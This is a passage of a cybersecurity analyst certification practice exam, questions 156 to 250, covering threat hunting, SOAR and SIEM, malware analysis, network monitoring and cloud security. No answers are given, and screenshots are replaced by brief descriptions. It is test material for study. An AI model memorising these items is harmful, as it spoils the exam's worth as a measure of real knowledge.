  156. Alaina has configured her SOAR system to detect irregularities in geographical information for logins to her organization's administrative systems. The system alarms, noting that an administrator has logged in from a location that they do not typically log in from. What other information would be most useful to correlate with this to determine if the login is a threat?
    1. Anomalies in privileged account usage
    2. Time-based login information
    3. A mobile device profile change
    4. DNS request anomalies
  157. Megan wants to check memory utilization on a macOS-based system. What Apple tool can she use to do this?
    1. Activity Monitor
    2. MemControl
    3. Running memstat from the command line
    4. Running memctl from the command line
  158. Fiona is considering a scenario in which components that her organization uses in its software that come from public GitHub repositories are Trojaned. What should she do first to form the basis of her proactive threat-hunting effort?
    1. Search for examples of a similar scenario.
    2. Validate the software currently in use from the repositories.
    3. Form a hypothesis.
    4. Analyze the tools available for this type of attack.
  159. Tracy has reviewed the CrowdStrike writeup for an APT group known as HELIX KITTEN, which notes that the group is known for creating “thoroughly researched and structured spear-phishing messages relevant to the interests of targeted personnel.” What types of defenses are most likely to help if she identifies HELIX KITTEN as a threat actor of concern for her organization?
    1. DKIM
    2. An awareness campaign
    3. Blocking all email from unknown senders
    4. SPF
  160. Micah wants to use the data he has collected to help with his threat-hunting practice. What type of approach is best suited to using large volumes of log and analytical data?
    1. Hypothesis-driven investigation
    2. Investigation based on indicators of compromise
    3. Investigation based on indications of attack
    4. AI/ML-based investigation
  161. Dani wants to analyze a malware package that calls home. What should she consider before allowing the malware to “phone home”?
    1. Whether the malware may change behavior.
    2. Whether the host IP or subnet may become a target for further attacks.
    3. Attacks may be staged by the malware against other hosts.
    4. All of the above.
  162. As part of her threat-hunting activities, Olivia bundles her critical assets into groups. Why would she choose to do this?
    1. To increase the complexity of analysis
    2. To leverage the similarity of threat profiles
    3. To mix sensitivity levels
    4. To provide a consistent baseline for threats
  163. Unusual outbound network traffic, abnormal HTML response sizes, DNS request anomalies, and mismatched ports for application traffic are all examples of what?
    1. Threat hunting
    2. SCAP
    3. Indicators of compromise
    4. Continuous threat feeds
  164. Naomi wants to improve the detection capabilities for her security environment. A major concern for her company is the detection of insider threats. What type of technology can she deploy to help with this type of proactive threat detection?
    1. IDS
    2. UEBA
    3. SOAR
    4. SIEM
  165. Ling wants to use her SOAR platform to handle phishing attacks more effectively. What elements of potential phishing emails should she collect as part of her automation and workflow process to triage and assign severity indicators?
    1. Subject lines
    2. Email sender addresses
    3. Attachments
    4. All of the above
  166. Isaac wants to write a script to query the BotScout forum bot blocklisting service. What data should he use to query the service based on the following image?
    A BotScout window presenting a table with date, name, email, IP, and from columns.
    1. Email address
    2. Name
    3. IP address
    4. Date
  167. Syslog, APIs, email, STIX/TAXII, and database connections are all examples of what for a SOAR?
    1. IOCs
    2. Methods of data ingestion
    3. SCAP connections
    4. Attack vectors
  168. Yaan uses multiple data sources in his security environment, adding contextual information about users from Active Directory, geolocation data, multiple threat data feeds, as well as information from other sources to improve his understanding of the security environment. What term describes this process?
    1. Data drift
    2. Threat collection
    3. Threat centralization
    4. Data enrichment
  169. Mila is reviewing feed data from the MISP open-source threat intelligence tool and sees the following entry:
    "Unit 42 has discovered a new malware family we've named
    "Reaver" with ties to attackers who use SunOrcal malware.
    SunOrcal activity has been documented to at least 2013, and
    based on metadata surrounding some of the C2s, may have been
    active as early as 2010. The new family appears to have been in
    the wild since late 2016 and to date we have only identified 10
    unique samples, indicating it may be sparingly used. Reaver is
    also somewhat unique in the fact that its final payload is in
    the form of a Control panel item, or CPL file. To date, only
    0.006% of all malware seen by Palo Alto Networks employs this
    technique, indicating that it is in fact fairly rare.", "Tag":
    [{"colour": "#00223b", "exportable": true, "name":
    "osint:source-type="blog-post""}], "disable_correlation":
    false, "object_relation": null, "type": "comment"}, {"comment":
    "", "category": "Persistence mechanism", "uuid": "5a0a9d47-
    1c7c-4353-8523-440b950d210f", "timestamp": "1510922426",
    "to_ids": false, "value": "%COMMONPROGRAMFILES%\services\",
    "disable_correlation": false, "object_relation": null, "type":
    "regkey"}, {"comment": "", "category": "Persistence mechanism",
    "uuid": "5a0a9d47-808c-4833-b739-43bf950d210f", "timestamp":
    "1510922426", "to_ids": false, "value":
    "%APPDATA%\microsoft\mmc\", "disable_correlation": false,
    "object_relation": null, "type": "regkey"}, {"comment": "",
    "category": "Persistence mechanism", "uuid": "5a0a9d47-91e0-
    4fea-8a8d-48ce950d210f", "timestamp": "1510922426", "to_ids":
    false, "value":
    "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\
    Shell Folders\Common Startup"
    

    How does the Reaver malware maintain persistence?

    1. A blog post
    2. Inserts itself into the Registry
    3. Installs itself as a runonce key
    4. Requests user permission to start up
  170. Isaac's organization has deployed a security tool that learns how network users typically behave and then searches for differences that match attack behaviors. What type of system can automatically analyze this data to build detection capability like this?
    1. Signature-based analysis
    2. A Babbage machine
    3. Machine learning
    4. Artificial network analysis
  171. What is the advantage of a SOAR system over a traditional SIEM system?
    1. SOAR systems are less complex to manage.
    2. SOAR systems handle large log volumes better using machine learning.
    3. SOAR systems integrate a wider range of internal and external systems.
    4. SOAR logs are transmitted only over secure protocols.
  172. Fiona has continued her threat-hunting efforts and has formed a number of hypotheses. What key issue should she consider when she reviews them?
    1. The number of hypotheses
    2. Her own natural biases
    3. Whether they are strategic or operational
    4. If the attackers know about them
  173. Nathan wants to determine which systems are sending the most traffic on his network. What low-overhead data-gathering methodology can he use to view traffic sources, destinations, and quantities?
    1. A network sniffer to view all traffic
    2. Implementing NetFlow
    3. Implementing SDWAN
    4. Implementing a network tap
  174. Adam is reviewing a Wireshark packet capture in order to perform protocol analysis, and he notes the following data in the Wireshark protocol hierarchy statistics. What percentage of traffic is most likely encrypted web traffic?
    A Wireshark Protocol Hierarchy Statistics window.
    1. 85.9 percent
    2. 1.7 percent
    3. 20.3 percent
    4. 1.9 percent
  175. Annie is reviewing a packet capture that she believes includes the download of malware. What host should she investigate further as the source of the malware based on the activity shown in the following image from her packet analysis efforts?
    A packet capture window presenting the number, time, source, destination, protocol, length, and info columns.
    1. 172.17.8.8
    2. 49.51.172.56
    3. 172.17.8.172
    4. 56.172.51.49
  176. Steve uploads a malware sample to an analysis tool and receives the following messages:
    >Executable file was dropped: C:\Logs\mffcae1.exe
    >Child process was created, parent C:\Windows\system32\cmd.exe
    >mffcae1.exe connects to unusual port
    >File downloaded: cx99.exe
    

    If he wanted to observe the download behavior himself, what is the best tool to capture detailed information about what occurs?

    1. An antimalware tool
    2. Wireshark
    3. An IPS
    4. Network flows
  177. Abdul is analyzing proxy logs from servers that run in his organization and notices two proxy log servers have entries for similar activities that always occur one hour apart from each other. Both proxy servers are in the same datacenter, and the activity is part of a normal evening process that runs at 7 p.m. One proxy server records the data at 7 p.m., and one records the entry at 6 p.m. What issue has Abdul likely encountered?
    1. A malware infection emulating a legitimate process
    2. An incorrect time zone setting
    3. A flaw in the automation script
    4. A log entry error
  178. Eric is performing threat intelligence work and wants to characterize a threat actor that his organization has identified. The threat actor is similar to the group known as Anonymous and has targeted organizations for political reasons in the past. How should he characterize this threat actor?
    1. Unwitting insiders
    2. Unknown
    3. APT
    4. Hacktivist
  179. What do DLP systems use to classify data and to ensure that it remains protected?
    1. Data signatures
    2. Business rules
    3. Data egress filters
    4. Data at rest
  180. Benicio wants to implement a tool for all the workstations and laptops in his company that can combine behavioral detection attack indicators based on current threat intelligence with real-time visibility into the systems. What sort of tool should he select?
    1. An IPS
    2. An EDR
    3. A CRM
    4. A UEBA
  181. Eric wants to analyze a malware binary in the safest way possible. Which of the following methods has the least likelihood of allowing the malware to cause problems?
    1. Running the malware on an isolated VM
    2. Performing dynamic analysis of the malware in a sandbox
    3. Performing static analysis of the malware
    4. Running the malware in a container service
  182. Tom wants to improve his detection capabilities for his software-as-a-service (SaaS) environment. What technology is best suited to give him a view of usage, data flows, and other details for cloud environments?
    1. EDR
    2. CASB
    3. IDS
    4. SIEM
  183. Juan wants to audit filesystem activity in Windows and configures Windows filesystem auditing. What setting can he set to know if a file was changed or not using Windows file auditing?
    1. Set Detect Change
    2. Set Validate File Versions
    3. Set Audit Modifications
    4. None of the above
  184. Naomi wants to analyze URLs found in her passive DNS monitoring logs to find domain generation algorithm (DGA)–generated command-and-control links. What techniques are most likely to be useful for this?
    1. WHOIS lookups and NXDOMAIN queries of suspect URLs
    2. Querying URL allowlists
    3. DNS probes of command-and-control networks
    4. Natural language analysis of domain names
  185. Kathleen wants to ensure that her team of security analysts sees important information about the security status of her organization whenever they log in to the SIEM. What part of a SIEM is designed to provide at-a-glance status information using the “single pane of glass” approach?
    1. The reporting engine
    2. Email reports
    3. The dashboard
    4. The ruleset
  186. Lucca is reviewing bash command history logs on a system that he suspects may have been used as part of a breach. He discovers the following grep command run inside of the /users directory by an administrative user. What will the command find?
    grep -r "sudo" /home/users/ | grep "bash.log"
    
    1. All occurrences of the sudo command on the system
    2. All occurrences of root logins by users
    3. All occurrences of the sudo command in bash log files in user home directories
    4. All lines that do not contain the word sudo or bash.log in user directories
  187. Cynthia wants to build scripts to detect malware beaconing behavior. Which of the following is not a typical means of identifying malware beaconing behavior on a network?
    1. Persistence of the beaconing
    2. Beacon protocol
    3. Beaconing interval
    4. Removal of known traffic
  188. Eric has access to a full suite of network monitoring tools and wants to use appropriate tools to monitor network bandwidth consumption. Which of the following is not a common method of monitoring network bandwidth usage?
    1. SNMP
    2. Portmon
    3. Packet sniffing
    4. NetFlow
  189. Kelly sees high CPU utilization in the Windows Task Manager, as shown here, while reviewing a system's performance issues. If she wants to get a detailed view of the CPU usage by application, with PIDs and average CPU usage, what native Windows tool can she use to gather that detail?
    A Windows Task Manager screenshot showing high CPU utilization.
    1. Resource Monitor
    2. Task Manager
    3. iperf
    4. Perfmon
  190. Roger's monitoring system provides Windows memory utilization reporting. Use the chart shown here to determine what actions Roger should take based on his monitoring.
    A memory capacity forecast chart showing Windows memory utilization over time.
    1. The memory usage is stable and can be left as it is.
    2. The memory usage is high and must be addressed.
    3. Roger should enable automatic memory management.
    4. There is not enough information to make a decision.
  191. NIST defines five major types of threat information in NIST SP 800-150, “Guide to Cyber Threat Information Sharing.”
    1. Indicators, which are technical artifacts or observables that suggest an attack is imminent, currently underway, or compromise may have already occurred
    2. Tactics, techniques, and procedures that describe the behavior of an actor
    3. Security alerts like advisories and bulletins
    4. Threat intelligence reports that describe actors, systems, and information being targeted and the methods being used
    5. Tool configurations that support collection, exchange, analysis, and use of threat information

    Which of these should Frank seek out to help him best protect the midsize organization he works for against unknown threats?

    1. 1, 2, and 5
    2. 1, 3, and 5
    3. 2, 4, and 5
    4. 1, 2, and 4
  192. Deepa is diagnosing major network issues at a large organization and sees the following graph in her PRTG console on the “outside” interface of her border router. What can Deepa presume has occurred?
    A PRTG graph of traffic on the border router's outside interface during the network issues.
    1. The network link has failed.
    2. A DDoS is in progress.
    3. An internal system is transferring a large volume of data.
    4. The network link has been restored.
  193. Angela wants to use her network security device to detect potential beaconing behavior. Which of the following options is best suited to detecting beaconing using her network security device?
    1. Antivirus definitions
    2. File reputation
    3. IP reputation
    4. Static file analysis
  194. A server in the datacenter that Chris is responsible for monitoring unexpectedly connects to an offsite IP address and transfers 9 GB of data to the remote system. What type of monitoring should Chris enable to best assist him in detecting future events of this type?
    1. Flow logs with heuristic analysis
    2. SNMP monitoring with heuristic analysis
    3. Flow logs with signature-based detection
    4. SNMP monitoring with signature-based detection
  195. While reviewing his network for rogue devices, Dan notes that for three days a system with MAC address D4:BE:D9:E5:F9:18 has been connected to a switch in one of the offices in his building. What information can this provide Dan that may be helpful if he conducts a physical survey of the office?
    1. The operating system of the device
    2. The user of the system
    3. The vendor that built the system
    4. The type of device that is connected
  196. While checking for bandwidth consumption issues, Bohai uses the ifconfig command on the Linux box that he is reviewing. He sees that the device has sent less than 4 GB of data, but his network flow logs show that the system has sent more than 20 GB. What problem has Bohai encountered?
    1. A rootkit is concealing traffic from the Linux kernel.
    2. Flow logs show traffic that does not reach the system.
    3. ifconfig resets traffic counters at 4 GB.
    4. ifconfig only samples outbound traffic and will not provide accurate information.
  197. Vlad believes that an attacker may have added accounts and attempted to obtain extra rights on a Linux workstation. Which of the following is not a common way to check for unexpected accounts like this?
    1. Review /etc/passwd and /etc/shadow for unexpected accounts.
    2. Check /home/ for new user directories.
    3. Review /etc/sudoers for unexpected accounts.
    4. Check /etc/groups for group membership issues.
  198. Ben wants to coordinate with other organizations in the information security community to share data and current events as well as warnings of new security issues. What type of organization should he join?
    1. An ISAC
    2. A CSIRT
    3. A VPAC
    4. An IRT
  199. While investigating a spam email, Adam is able to capture headers from one of the email messages that was received. He notes that the sender was Carmen Victoria Garci. What facts can he gather from the headers shown here?
    A window showing the headers of the spam email message.
    1. Victoria Garci's email address is [email protected].
    2. The sender sent via Yahoo.
    3. The sender sent via a system in Japan.
    4. The sender sent via Gmail.
  200. After submitting a suspected malware package to VirusTotal, Damian receives the following results. What does this tell Damian?
    A VirusTotal results window presenting a table of antivirus engine, result, and update date.
    1. The submitted file contains more than one malware package.
    2. Antivirus vendors use different names for the same malware.
    3. VirusTotal was unable to specifically identify the malware.
    4. The malware package is polymorphic, and matches will be incorrect.
  201. Laura needs to check on CPU, disk, network, and power usage on a Mac. What GUI tool can she use to check these?
    1. Resource Monitor
    2. System Monitor
    3. Activity Monitor
    4. Sysradar
  202. Nara is reviewing event logs to determine who has accessed a workstation after business hours. When she runs secpol.msc on the Windows system she is reviewing, she sees the following settings. What important information will be missing from her logs?
    A Local Security Policy window showing the Subcategory and Audit Events columns.
    1. Login failures
    2. User IDs from logins
    3. Successful logins
    4. Times from logins
  203. Profiling networks and systems can help to identify unexpected activity. What type of detection can be used once a profile has been created?
    1. Dynamic analysis
    2. Anomaly analysis
    3. Static analysis
    4. Behavioral analysis
  204. Singh is attempting to diagnose high memory utilization issues on a macOS system and notices a chart showing memory pressure. What does memory pressure indicate for macOS when the graph is yellow and looks like the following image?
    A chart depicts the data on memory pressure.
    1. Memory resources are available.
    2. Memory resources are available but being tasked by memory management processes.
    3. Memory resources are in danger, and applications will be terminated to free up memory.
    4. Memory resources are depleted, and the disk has begun to swap.
  205. Saanvi needs to verify that his Linux system is sending system logs to his SIEM. What method can he use to verify that the events he is generating are being sent and received properly?
    1. Monitor traffic by running Wireshark or tcpdump on the system.
    2. Configure a unique event ID and send it.
    3. Monitor traffic by running Wireshark or tcpdump on the SIEM device.
    4. Generate a known event ID and monitor for it.
  206. Maria wants to understand what a malware package does and executes it in a virtual machine that is instrumented using tools that will track what the program does, what changes it makes, and what network traffic it sends while allowing her to make changes on the system or to click files as needed. What type of analysis has Maria performed?
    1. Manual code reversing
    2. Interactive behavior analysis
    3. Static property analysis
    4. Dynamic code analysis
  207. Alyssa is analyzing a piece of malicious code that has arrived in her organization and finds that it is an executable file. She uses specialized tools to retrieve the source code from the executable files. What type of action is she taking?
    1. Sandboxing
    2. Reverse engineering
    3. Fingerprinting
    4. Darknet analysis
  208. A major new botnet infection that uses a peer-to-peer command-and-control process has been released. Latisha wants to detect infected systems but knows that peer-to-peer communication is irregular and encrypted. If she wants to monitor her entire network for this type of traffic, what method should she use to catch infected systems?
    1. Build an IPS rule to detect all peer-to-peer communications that match the botnet's installer signature.
    2. Use beaconing detection scripts focused on the command-and-control systems.
    3. Capture network flows for all hosts and use filters to remove normal traffic types.
    4. Immediately build a network traffic baseline and analyze it for anomalies.
  209. While investigating a compromise, Jack discovers four files that he does not recognize and believes may be malware. What can he do to quickly and effectively check the files to see whether they are malware?
    1. Submit them to a site like VirusTotal.
    2. Open them using a static analysis tool.
    3. Run strings against each file to identify common malware identifiers.
    4. Run a local antivirus or antimalware tool against them.
  210. Brian's network suddenly stops working at 8:40 a.m., interrupting videoconferences, streaming, and other services throughout his organization, and then resumes functioning. When Brian logs into his PRTG console and checks his router's traffic via the primary connection's redundant network link, he sees the following graph. What should Brian presume occurred based on this information?
    A PRTG graph showing the router's traffic via the primary connection's redundant network link.
    1. The network failed and is running in cached mode.
    2. There was a link card failure, and the card recovered.
    3. His primary link went down, and he should check his secondary link for traffic.
    4. PRTG stopped receiving flow information and needs to be restarted.
  211. Adam works for a large university and sees the following graph in his PRTG console when looking at a yearlong view. What behavioral analysis could he leverage based on this pattern?
    A graph of megabits per second versus time over a one-year period.
    1. Identify unexpected traffic during breaks like the low point at Christmas.
    2. He can determine why major traffic drops happen on weekends.
    3. He can identify top talkers.
    4. Adam cannot make any behavioral determinations based on this chart.
  212. Samantha is preparing a report describing the common attack models used by advanced persistent threat actors. Which of the following is a typical characteristic of APT attacks?
    1. They involve sophisticated DDoS attacks.
    2. They quietly gather information from compromised systems.
    3. They rely on worms to spread.
    4. They use encryption to hold data hostage.
  213. While reviewing system logs, Charles discovers that the processor for the workstation he is reviewing has consistently hit 100 percent processor utilization by the web browser. After reviewing the rest of the system, no unauthorized software appears to have been installed. What should Charles do next?
    1. Review the sites visited by the web browser when the CPU utilization issues occur.
    2. Check the browser binary against a known good version.
    3. Reinstall the browser.
    4. Disable TLS.
  214. Barb wants to detect unexpected output from the application she is responsible for managing and monitoring. What type of tool can she use to detect unexpected output effectively?
    1. A log analysis tool
    2. A behavior-based analysis tool
    3. A signature-based detection tool
    4. Manual analysis
  215. Greg suspects that an attacker is running an SSH server on his network over a nonstandard port. What port is normally used for SSH communications?
    1. 21
    2. 22
    3. 443
    4. 444
  216. Amanda is reviewing the security of a system that was previously compromised. She is searching for signs that the attacker has achieved persistence on the system. Which one of the following should be her highest priority to review?
    1. Scheduled tasks
    2. Network traffic
    3. Running processes
    4. Application logs
  217. Brendan is reviewing a series of syslog entries and notices several with different logging levels. Which one of the following messages should he review first?
    1. Level 0
    2. Level 1
    3. Level 5
    4. Level 7
  218. You are looking for operating system configuration files that are stored on a Linux system. Which one of the following directories is most likely to contain those files?
    1. /bin
    2. /
    3. /etc
    4. /dev
  219. Which one of the following is not a standard Windows system process?
    1. SERVICES.EXE
    2. MALWARESCAN.EXE
    3. WINLOGIN.EXE
    4. LSASS.EXE
  220. Which one of the following computer hardware components is responsible for executing instructions found in code?
    1. RAM
    2. CPU
    3. SSD
    4. HDD
  221. You are deciding where to place a web server in an on-premises network architecture. The server will be accessible by the general public. Which one of the following network zones would be the most appropriate?
    1. Intranet subnet
    2. Internet subnet
    3. Screened subnet
    4. Database subnet
  222. Matthew is reviewing a new cloud service offering that his organization plans to adopt. In this offering, a cloud provider will create virtual server instances under the multitenancy model. Each server instance will be accessible only to Matthew's company. What cloud deployment model is being used?
    1. Hybrid cloud
    2. Public cloud
    3. Private cloud
    4. Community cloud
  223. In a zero-trust network architecture, what criteria is used to make trust decisions?
    1. Identity of a user or device
    2. IP address
    3. Network segment
    4. VLAN membership
  224. Lynn's organization is moving toward a secure access service edge (SASE) approach to security. Which one of the following technologies is least likely to be included in a SASE architecture?
    1. NGFW
    2. CASB
    3. Hypervisor
    4. WAN
  225. Which one of the following technologies would not commonly be used as part of a passwordless authentication approach?
    1. Shadow file
    2. Windows Hello
    3. Smartphone app
    4. Biometrics
  226. During their organization's incident response preparation, Manish and Linda are identifying critical information assets that the company uses. Included in their organizational data sets is a list of customer names, addresses, phone numbers, and demographic information. How should Manish and Linda classify this information?
    1. PII
    2. Intellectual property
    3. PHI
    4. PCI DSS
  227. Randy received a complaint from an end user that links from a legitimate site are being removed from email messages. After examining several of those links, he notes that they all have a common domain:

    http://bit.ly/3.H9CaOv

    http://bit.ly/3.VswDqG

    http://bit.ly/3.XLwMXT

    What is the reason these links were blocked?

    1. This is a malicious domain.
    2. This is a URL redirection domain.
    3. This is obscene content.
    4. This is a false positive.
  228. Derek sets up a series of virtual machines that are automatically created in a completely isolated environment. Once created, the systems are used to run potentially malicious software and files. The actions taken by those files and programs are recorded and then reported. What technique is Derek using?
    1. Sandboxing
    2. Reverse engineering
    3. Malware disassembly
    4. Darknet analysis
  229. Which one of the following attackers generally only uses code written by others with minor modifications?
    1. Nation-state actor
    2. Hacktivist
    3. Script kiddie
    4. Insider
  230. Tanya is creating an open-source intelligence operation for her organization. Which one of the following sources would she be least likely to use in this work?
    1. Web server logs
    2. Dark websites
    3. Government bulletins
    4. Social media
  231. What organizations did the U.S. government help create to help share knowledge between organizations in specific verticals?
    1. DHS
    2. SANS
    3. CERTS
    4. ISACs
  232. Which one of the following teams is least likely to be the recipient of threat intelligence data?
    1. Incident response
    2. Vulnerability management
    3. Risk management
    4. Human resources
  233. The ATT&CK framework defines which of the following as “the specifics behind how the adversary would attack the target”?
    1. The threat actor
    2. The targeting method
    3. The attack vector
    4. The organizational weakness
  234. Kevin is trying to identify security processes that may be suitable for automation. Which one of the following characteristics best identifies those processes?
    1. Human interaction required
    2. Repeatable
    3. High criticality
    4. Low sensitivity
  235. Brian is selecting a CASB for his organization, and he would like to use an approach that interacts with the cloud provider directly. Which CASB approach is most appropriate for his needs?
    1. Inline CASB
    2. Outsider CASB
    3. Comprehensive CASB
    4. API-based CASB
  236. Sherry is deploying a zero-trust network architecture for her organization. In this approach, which one of the following characteristics would be least important in validating a login attempt?
    1. User identity
    2. IP address
    3. Geolocation
    4. Nature of requested access
  237. Lisa wants to integrate with a cloud identity provider that uses OAuth 2.0, and she wants to select an appropriate authentication framework. Which of the following best suits her needs?
    1. OpenID Connect
    2. SAML
    3. RADIUS
    4. Kerberos
  238. Which lookup tool provides information about a domain's registrar and physical location?
    1. nslookup
    2. host
    3. WHOIS
    4. traceroute
  239. Vince recently received the hash values of malicious software that several other firms in his industry found installed on their systems after a compromise. What term best describes this information?
    1. Vulnerability feed
    2. IoC
    3. TTP
    4. RFC
  240. A PIN is an example of what type of authentication factor?
    1. Something you know
    2. Something you are
    3. Something you have
    4. Something you set
  241. Brian recently joined an organization that runs the majority of its services on a virtualization platform located in its own datacenter but also leverages an IaaS provider for hosting its web services and an SaaS email system. What term best describes the type of cloud environment this organization uses?
    1. Public cloud
    2. Dedicated cloud
    3. Private cloud
    4. Hybrid cloud
  242. What type of malware is characterized by spreading from system to system under its own power by exploiting vulnerabilities that do not require user intervention?
    1. Trojan horse
    2. Virus
    3. Logic bomb
    4. Worm
  243. Which of the following threat actors typically has the greatest access to resources?
    1. Nation-state actors
    2. Organized crime
    3. Hacktivists
    4. Insider threats
  244. Which one of the following information sources would not be considered an OSINT source?
    1. DNS lookup
    2. Search engine research
    3. Port scans
    4. WHOIS queries
  245. Gabby's organization captures sensitive customer information, and salespeople and others often work with that data on local workstations and laptops. After a recent inadvertent breach where a salesperson accidentally sent a spreadsheet of customer information to another customer, her organization is seeking a technology solution that can help prevent similar problems. What should Gabby recommend?
    1. IDS
    2. FSB
    3. DLP
    4. FDE
  246. Ben is using the sudo command to carry out operations on a Linux server. What type of access is he using?
    1. Service access
    2. Unauthorized access
    3. User access
    4. Privileged access
  247. When Lucca wants to test a potentially malicious file, he uploads it to a third-party website. That website places the software in a secured testing environment, documents what it does, and then uses antimalware tools to try to identify it. What is that type of secure testing environment called?
    1. A software jail
    2. A sandbox
    3. A litterbox
    4. A root dungeon
  248. Valerie's organization recently fell victim to a scam where an attacker emailed various staff members from an account that appeared to belong to a senior vice president in the organization. The email stated that the vice president was out of the office and needed iTunes gift cards to purchase an application that she needed to accomplish her work. The email asked that the individual immediately purchase an iTunes gift card and send it back via email so that the vice president could continue her work. Valerie wants to prevent this type of attack from succeeding in the future. What should she recommend as an appropriate preventative measure?
    1. Require the organization to use digital signatures for all email.
    2. Require the use of DKIM.
    3. Require the use of SPF and DMARC.
    4. Implement awareness training including simulated phishing attacks.
  249. Which of the following measures is not commonly used to assess threat intelligence?
    1. Timeliness
    2. Detail
    3. Accuracy
    4. Relevance
  250. Sara has been asked to explain to her organization how an endpoint detection and response (EDR) system could help the organization. Which of the following functions is not a typical function for an EDR system?
    1. Endpoint data collection and central analysis
    2. Automated responses to threats
    3. Forensic analysis to help with threat response and detection
    4. Cloud and network data collection and central analysis